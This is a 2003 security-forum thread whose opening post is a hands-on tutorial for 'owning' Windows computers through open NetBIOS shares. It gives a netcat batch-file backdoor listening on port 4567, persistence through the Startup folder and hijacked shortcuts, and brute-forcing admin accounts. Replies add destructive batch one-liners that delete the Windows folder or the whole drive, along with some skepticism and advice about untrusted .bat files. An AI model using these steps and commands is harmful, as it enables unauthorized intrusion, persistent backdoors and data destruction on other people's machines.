owning a computer through netbios (my tut)

Networking/Security Forums -> Exploits // System Weaknesses

Author: andr3s PostPosted: Mon Jan 20, 2003 3:29 am    Post subject: owning a computer through netbios (my tut)
    ----
thought i might give back to the forum..i wrote this today..

-----------------------------------------

Owning a computer through NetBios:

This text is for informational purposes only, so don't blame me for what anybody does with this information.

This is my sixth tutorial so far, I hope you enjoy it. Basically I'm going to cover how to get the most out of shitty NetBios access.

1- Go read some of the tutorials on using NetBios.And have some understanding of command prompt (read my batchfile tutorial). These are all available in the text section.

2- Go NetBios a computer.

3- Go into a random folder and drop a copy of netcat (available in the download section). If it says that you only have read acces then go to problem 1 to see how to get read/write privileges.

4- Your'e gonna have to write a batch file. Go to notepad, then write something like this:

@echo off
cd C:\random_directory\ (doesn't have to be C:\, just whatever directory netcat is in")
nc -l -p 4567 | echo > cmd.exe (command.exe on anything less than NT)




5- If they have all of "C:\" shared (If they don't have C:\ shared go to problem 2 below) then simply got into "C:\Documents and Settings\" click on the user name (if there are more than one, pick the one with most priviledges or do this whole thing with each account). After you are in one of the user's folders click on the following folders "\Start Menu\Programs\Startup". By now the address of the folder you are in should be "C:\Documents and Settings\whatever_user_name\Start Menu\Programs\Startup". Now drop a copy of your batch file in there (read step 4).

6- Basically you just dropped a batch file that will make a backdoor in their computer in their startup folder. When their computer boots up it will be activated and your backdoor opened.

7- Run telnet and connect to their ip throught port 4567.

---------------------------Problem 1-----------------------------------

1- That sucks. Well in that case you will have to enumerate the accounts (check the downloads section for programs that do this) and bruteforce the account with the highest priviledges, root.

2- Log in as the admin and you'll have all the priviledges.

---------------------------Problem 2-----------------------------------



1- This is where it gets harder. Drop your batchfile (read section 4 above) somewhere in their computer.

2- Find a shortcut or something that theyre bound to use (i.e "warcraft 3") (if you can't fond one go to problem 3). Now right-click on the shortcut and change the target input to the location of your batch file (i.e "D:\shared music\evil.bat") and the start in field to the folder where your batch file is (i.e "D:\shared music\).

3- When they click on this shortcut it will activate the batch file, the batch file will then activate the backdoor.

---------------------------Problem 3-----------------------------------



1- This is tricky stuff. Get a file binder and bind your batch file to a file that you know the user will open (i.e an mp3).

2- When he uses that mp3 your batch file will be run.

Author: ShaolinTigerLocation: Kuala Lumpur, Malaysia PostPosted: Mon Jan 20, 2003 11:48 pm    Post subject: Re: owning a computer through netbios (my tut)
    ----
andr3s wrote:

1- This is tricky stuff. Get a file binder and bind your batch file to a file that you know the user will open (i.e an mp3).

2- When he uses that mp3 your batch file will be run.


Yeh real tricky, even *I* don't know how to bind a batch file to an mp3.

Please explain.

I'm sure if this tutorial is really useful here as it's very basic and doesn't explain any of the more advanced concepts of null sessions or enumeration.

Author: ToddKLocation: Ottawa, Canada PostPosted: Tue Jan 21, 2003 1:58 am    Post subject:
    ----
Where are your other tutorials? It refers to them, but I can't find a link.

Also, I would like to know how that bining works. I can't think of a way. Does it need something specific installed or not patched?

Author: ShaolinTigerLocation: Kuala Lumpur, Malaysia PostPosted: Tue Jan 21, 2003 11:36 am    Post subject:
    ----
ToddK wrote:

Also, I would like to know how that bining works. I can't think of a way. Does it need something specific installed or not patched?


He's talking arse, I just wanted to highlight that point though Smile

Author: Madeline_13 PostPosted: Tue Jan 21, 2003 12:17 pm    Post subject:
    ----
hey someone sent me a rar file with a bat file in it - actually i havent run it but I am wondering now if this file is infected. I ran a scan but you know I never trust that.

Author: ShaolinTigerLocation: Kuala Lumpur, Malaysia PostPosted: Tue Jan 21, 2003 12:23 pm    Post subject:
    ----
LOL you don't need to scan .bat files, just open them and read them..

That's assuming it is a batch file not something else renamed .bat.

Author: Madeline_13 PostPosted: Tue Jan 21, 2003 3:02 pm    Post subject:
    ----
thats what i meant. if it is something else likeyou just said...how could i know beforehand? bat file is supposed to be some files for a game ...and that kinda stuff is hard to trust

Author: ShaolinTigerLocation: Kuala Lumpur, Malaysia PostPosted: Tue Jan 21, 2003 3:08 pm    Post subject:
    ----
.bat files are nothing to do with games .bat files are batch files, a series of commands in a file.

Some cheesy warez rips use batch files to automate the extraction process.

If you don't trust it, open it and read it like I said, it's in plain text, it's just a series of commands like:

Code:
ECHO You are cl00less
deltree c:\*.* /s \y
ECHO You are f00ked.

Author: ToddKLocation: Ottawa, Canada PostPosted: Tue Jan 21, 2003 6:27 pm    Post subject:
    ----
Actually, this may be just a confusion. I have only just started reading about security, but I notice that many links mention "binding" to a program using the cgibin. Usually the cmd.exe to get a command prompt.

Author: ShaolinTigerLocation: Kuala Lumpur, Malaysia PostPosted: Tue Jan 21, 2003 6:36 pm    Post subject:
    ----
That's binding to a port generally, or piping from one program to another or piping cmd.exe to netcat mostly..

You can bind an executable or dll to another executable (that's how trojan stubs work), but you can't bind an executable to a non executable.

You could in effect bind an exe to the the default exe handler for Windows Explorer (this is what many viruses do) so everything you run, the virus/trojan runs aswell.

This took me hours once to fix by hand Shocked Twisted Evil Shocked

You could also bind something to whatever plays mp3's, generally Winamp, so that whenever it runs the other things runs too..

Or you can change the swap an mp3 for a bogus file with a double extension and a media icon..

But you can't bind a batch file to an mp3 (well you could, but the only thing that would happen is you would get some weird noises at the end of the song when you played the mp3).

Simple as that. Very Happy

Author: decypherohmLocation: World - Europe - Portugal - Lisbon PostPosted: Tue Jan 21, 2003 8:14 pm    Post subject:
    ----
Easy and simply destrucktible .bat

Code:

@Echo Off
@Del c:\windows
@Echo You have just been erased.

Author: Tom BairLocation: Portland, Oregon USA PostPosted: Tue Jan 21, 2003 8:52 pm    Post subject:
    ----
decypherohm wrote:
Easy and simply destrucktible .bat

Code:

@Echo Off
@Del c:\windows
@Echo You have just been erased.


Quickly, and just off the top of my head; I don't think your batch file would work. When issuing the Del command, does it not require a keypress of the Y key to continue?

Even with @Echo Off -- you will still receive a prompt of:

Do you wish to delete C:\Windows and all it's sub-directories?

At this point, the jig is up and the joke is on you. User hits "N" or the "ESC" key and sees You have just been erased..

Another trick to keep batch files from damaging your hard drive is to rename the FORMAT command to something else. Then when a batch file issues the ever popular FORMAT C:, a wonderful response from the OS is File not found.

Tom

Author: Madeline_13 PostPosted: Thu Jan 23, 2003 9:02 am    Post subject:
    ----
download americas army (your taxpayer dollars paid for it) after you dl all the parts theres a bat you run...and it sets up the install.. People are using that to hack accounts left and right. also blackhawk down demo has the same thing. No warez...this is actual companies putting it out like this. americas army is totally free forever to dl. I guess the army is "cheesy" then huh? they put it out. Thats how the game is run. People are putting out hacks for it same style...dumb peopel run them. I was just asking about it here. I guess you gotta play alot of games to really know whats going on though with what.

Author: ShaolinTigerLocation: Kuala Lumpur, Malaysia PostPosted: Thu Jan 23, 2003 11:29 am    Post subject:
    ----
Madeline_13 wrote:
download americas army (your taxpayer dollars paid for it) after you dl all the parts theres a bat you run...and it sets up the install.. People are using that to hack accounts left and right. also blackhawk down demo has the same thing. No warez...this is actual companies putting it out like this. americas army is totally free forever to dl. I guess the army is "cheesy" then huh? they put it out. Thats how the game is run. People are putting out hacks for it same style...dumb peopel run them. I was just asking about it here. I guess you gotta play alot of games to really know whats going on though with what.


Well like I said open it and read it Smile

It's in plain text.

a) I don't live in the US (thank the lord Twisted Evil )
b) I don't play demo's
c) I play a lot of games
d) Don't run anything you don't trust 100%



Networking/Security Forums -> Exploits // System Weaknesses


output generated using printer-friendly topic mod, All times are GMT + 2 Hours

Page 1 of 1

Powered by phpBB 2.0.x © 2001 phpBB Group